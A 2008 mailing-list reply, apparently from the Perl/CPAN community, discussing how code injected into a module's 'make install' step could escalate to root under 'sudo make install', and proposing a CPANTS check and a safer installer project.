# from Michael Peters # on Monday 22 September 2008 09:24: >> Correct me if I've misunderstood something, but if you have a >> malicious user on your box, I would assume that them trying to >> attack a CPAN install process is the least of your worries. > >You're right. If they are a malicious user then they will find a way > to screw you. I'm just saying that since we know about this path, > let's eliminate it, or at least make it public and known.
Injecting something into the 'make install' target could be a known and predictable way to acquire root privileges. So, it is a way for a small leak from e.g. a www-user hole to get much bigger. And that's why you shouldn't run 'sudo make install' -- it is still arbitrary code. If anyone has some tuits, this would really like to have an installer (needs to either run visudo or tell you what to put in it) and some way to test it (like a chroot.) http://scratchcomputing.com/svn/stowpan/trunk >> This is a CPANTS issue. > >I agree. Yes. There is already an 'unpacks nicely' metric, right? --Eric -- "It works better if you plug it in!" --Sattinger's Law --------------------------------------------------- http://scratchcomputing.com ---------------------------------------------------
